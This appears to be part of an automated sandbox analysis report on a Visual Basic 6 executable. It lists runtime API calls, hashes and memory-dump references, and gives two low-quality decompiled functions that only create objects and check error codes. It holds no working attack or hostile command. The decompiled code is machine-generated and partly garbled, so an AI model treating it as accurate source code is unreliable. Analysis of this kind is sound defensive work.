                              • API String ID: 3067788333-3455773497
                              • Opcode ID: 0c3064115717f1ac50398ab6b92702e3a18299170401f4184021512798b3afa1
                              • Instruction ID: 9c9f750e3ffaf1b94bc787d7f40b5fab412ab773200aaa50e83ef5503dfdb722
                              • Opcode Fuzzy Hash: 0c3064115717f1ac50398ab6b92702e3a18299170401f4184021512798b3afa1
                              • Instruction Fuzzy Hash: B141B3B1C10228EFCB55CF98D885ADEBFB8FB49700F10816BE14AA7650DB741689CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 00410EEF
                              • #588.MSVBVM60(00000002,00000001,00000000), ref: 00410EFA
                              • __vbaNew2.MSVBVM60(0040C430,00413338), ref: 00410F1D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,0000001C), ref: 00410F42
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C2A8,00000054), ref: 00410F86
                              • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00410FBD
                              • __vbaFreeObj.MSVBVM60 ref: 00410FC6
                              • __vbaFreeVar.MSVBVM60 ref: 00410FCF
                              • __vbaFreeVar.MSVBVM60(0041100C), ref: 00410FFC
                              • __vbaFreeObj.MSVBVM60 ref: 00411005
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckHresult$#588LateNew2
                              • String ID:
                              • API String ID: 560782363-0
                              • Opcode ID: 48c36fe9d6eda2cf18a4be4725bed0e60cbf133814d75f6b630ae208fcf50c1b
                              • Instruction ID: b1583988c7a680b9ac489e468f2f848dc458502062e59417e504937bc2f0808b
                              • Opcode Fuzzy Hash: 48c36fe9d6eda2cf18a4be4725bed0e60cbf133814d75f6b630ae208fcf50c1b
                              • Instruction Fuzzy Hash: C0412770D40208EBCB14DF98D989A9DFBB8FF58705F10816AE405B72A0D7B49885CF98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00411627
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00411640
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411659
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C298,000001EC), ref: 004116A1
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004116AA
                              • __vbaFreeVar.MSVBVM60(004116CB), ref: 004116C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckHresultNew2
                              • String ID: LIMBERNESS$Xs
                              • API String ID: 4204301268-3945506932
                              • Opcode ID: 479aa5d71300ef31ccf78b96ab9ab54f3f59671d624f5b31244e8f81c71c1d86
                              • Instruction ID: ad877ba553e5b8492a8822e7f69b06417b44fdc95c1657ee7c0d5625b49b595c
                              • Opcode Fuzzy Hash: 479aa5d71300ef31ccf78b96ab9ab54f3f59671d624f5b31244e8f81c71c1d86
                              • Instruction Fuzzy Hash: 97218E70A40204DBCB00DF98DE89BDDBBB8FB48701F14856AF505F76A0D7795940CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410BE9
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00410C02
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410C1B
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C190,00000228), ref: 00410C5B
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410C64
                              • __vbaFreeStr.MSVBVM60(00410C85), ref: 00410C7E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckCopyHresultNew2
                              • String ID: Xs
                              • API String ID: 4138333463-372796199
                              • Opcode ID: 18945dcca7cc5c7842d0a287a9409329b85a5416c47885c6f3626c1cd877690d
                              • Instruction ID: 505a2d3dfff38582ee8a76d0fe486d04ccf630b49b12cde1ac143765decea39c
                              • Opcode Fuzzy Hash: 18945dcca7cc5c7842d0a287a9409329b85a5416c47885c6f3626c1cd877690d
                              • Instruction Fuzzy Hash: F9212C70900204EBCB04DFA8D989ADDBBF8FB5C300F10856AE445E7264D7789981CF98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410AFA
                              • __vbaNew2.MSVBVM60(0040C430,00413338,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B12
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,00000014,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B37
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C440,00000070,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B5B
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B64
                              • __vbaFreeStr.MSVBVM60(00410B85,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresult$CopyNew2
                              • String ID:
                              • API String ID: 3978771648-0
                              • Opcode ID: 0eb5118b17076e7658f81e19bd9cbd9d74da77b762ecabea7499860d38b4443c
                              • Instruction ID: 6168a3b14b59dde415c7b2d06f95efb231dce5ff45abc9e6a2ff6065f135e530
                              • Opcode Fuzzy Hash: 0eb5118b17076e7658f81e19bd9cbd9d74da77b762ecabea7499860d38b4443c
                              • Instruction Fuzzy Hash: 07117270D40209EBCB04DF94DD8AEEEBBB8FB58705F108126F501B71A0D7B86585CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004118F4
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 0041190D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C240,00000134), ref: 00411950
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00411959
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresultNew2
                              • String ID: Xs
                              • API String ID: 1645334062-372796199
                              • Opcode ID: f25745c29950f4e03f85561bb9808069391c2c4fa9c6cfb27c85b5a35b79d95f
                              • Instruction ID: 0f55bba0c738c00b82079899f206b619edd8583713f443ae4380c16875773979
                              • Opcode Fuzzy Hash: f25745c29950f4e03f85561bb9808069391c2c4fa9c6cfb27c85b5a35b79d95f
                              • Instruction Fuzzy Hash: A81163B5A00204DBC710DF98C989B9ABBF8FF4C700F10856AF645E7264D7789981CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 17%
                              			E004117E0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char _v28;
                              				intOrPtr* _t12;
                              				intOrPtr* _t14;
                              				intOrPtr* _t16;
                              				void* _t17;
                              				intOrPtr* _t26;
                              				void* _t27;
                              				void* _t29;
                              				intOrPtr _t30;
                              
                              				_t30 = _t29 - 0xc;
                              				 *[fs:0x0] = _t30;
                              				_v16 = _t30 - 0x14;
                              				_v12 = 0x4012b8;
                              				_v8 = 0;
                              				_t12 = _a4;
                              				 *((intOrPtr*)( *_t12 + 4))(_t12, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t27);
                              				_t14 =  *0x413010; // 0x73e858
                              				_v28 = 0;
                              				if(_t14 == 0) {
                              					__imp____vbaNew2(0x40c6ec, "X�s");
                              					_t14 =  *0x413010; // 0x73e858
                              				}
                              				_t16 =  &_v28;
                              				__imp____vbaObjSet(_t16,  *((intOrPtr*)( *_t14 + 0x338))(_t14));
                              				_t26 = _t16;
                              				_t17 =  *((intOrPtr*)( *_t26 + 0xc4))(_t26);
                              				asm("fclex");
                              				if(_t17 < 0) {
                              					__imp____vbaHresultCheckObj(_t17, _t26, 0x40c32c, 0xc4);
                              				}
                              				__imp____vbaFreeObj();
                              				_push(0x41188a);
                              				return _t17;
                              			}















                              0x004117e3
                              0x004117f2
                              0x004117ff
                              0x00411802
                              0x0041180b
                              0x0041180e
                              0x00411814
                              0x00411817
                              0x0041181e
                              0x00411821
                              0x0041182d
                              0x00411833
                              0x00411833
                              0x00411842
                              0x00411846
                              0x0041184c
                              0x00411851
                              0x00411857
                              0x0041185b
                              0x00411869
                              0x00411869
                              0x00411872
                              0x00411878
                              0x00000000

                              APIs
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs,?,?,?,?,?,?,?,00401316), ref: 0041182D
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401316), ref: 00411846
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C32C,000000C4,?,?,?,?,?,?,?,00401316), ref: 00411869
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401316), ref: 00411872
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresultNew2
                              • String ID: Xs
                              • API String ID: 1645334062-372796199
                              • Opcode ID: 853fbac6c64cfb274fa6564db1b32932e8e915cbbbcbc512635da73859d9a957
                              • Instruction ID: e1be241d3ec618004f9a4f585cad916155cd32e4e93ec53cb64d604b93e2ea91
                              • Opcode Fuzzy Hash: 853fbac6c64cfb274fa6564db1b32932e8e915cbbbcbc512635da73859d9a957
                              • Instruction Fuzzy Hash: 9B113074940204EBC710EF95CD89F9ABFBCFB48701F108566F545E32A0D7789985CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 17%
                              			E004109F0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char _v28;
                              				intOrPtr* _t12;
                              				intOrPtr* _t14;
                              				intOrPtr* _t16;
                              				void* _t17;
                              				intOrPtr* _t26;
                              				void* _t27;
                              				void* _t29;
                              				intOrPtr _t30;
                              
                              				_t30 = _t29 - 0xc;
                              				 *[fs:0x0] = _t30;
                              				_v16 = _t30 - 0x14;
                              				_v12 = 0x4011d8;
                              				_v8 = 0;
                              				_t12 = _a4;
                              				 *((intOrPtr*)( *_t12 + 4))(_t12, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t27);
                              				_t14 =  *0x413010; // 0x73e858
                              				_v28 = 0;
                              				if(_t14 == 0) {
                              					__imp____vbaNew2(0x40c6ec, "X�s");
                              					_t14 =  *0x413010; // 0x73e858
                              				}
                              				_t16 =  &_v28;
                              				__imp____vbaObjSet(_t16,  *((intOrPtr*)( *_t14 + 0x2fc))(_t14));
                              				_t26 = _t16;
                              				_t17 =  *((intOrPtr*)( *_t26 + 0x1b8))(_t26);
                              				asm("fclex");
                              				if(_t17 < 0) {
                              					__imp____vbaHresultCheckObj(_t17, _t26, 0x40c2d0, 0x1b8);
                              				}
                              				__imp____vbaFreeObj();
                              				_push(0x410a9a);
                              				return _t17;
                              			}















                              0x004109f3
                              0x00410a02
                              0x00410a0f
                              0x00410a12
                              0x00410a1b
                              0x00410a1e
                              0x00410a24
                              0x00410a27
                              0x00410a2e
                              0x00410a31
                              0x00410a3d
                              0x00410a43
                              0x00410a43
                              0x00410a52
                              0x00410a56
                              0x00410a5c
                              0x00410a61
                              0x00410a67
                              0x00410a6b
                              0x00410a79
                              0x00410a79
                              0x00410a82
                              0x00410a88
                              0x00000000

                              APIs
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs,?,?,?,?,?,?,?,00401316), ref: 00410A3D
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401316), ref: 00410A56
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C2D0,000001B8,?,?,?,?,?,?,?,00401316), ref: 00410A79
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401316), ref: 00410A82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresultNew2
                              • String ID: Xs
                              • API String ID: 1645334062-372796199
                              • Opcode ID: b63715c82151cf0ace84fd9a9ff5c75f9f22e2b23a17b2c91d560c3fa2009605
                              • Instruction ID: 242bca1f2000c737d0e60261897df8eb5ecf9bf14e91775128d24783151d3355
                              • Opcode Fuzzy Hash: b63715c82151cf0ace84fd9a9ff5c75f9f22e2b23a17b2c91d560c3fa2009605
                              • Instruction Fuzzy Hash: CB117C74A40204EBC710DFA5C949F9ABFBCAF58741F204566F545E36A0C7B89981CB98
                              Uniqueness

                              Uniqueness Score: -1.00%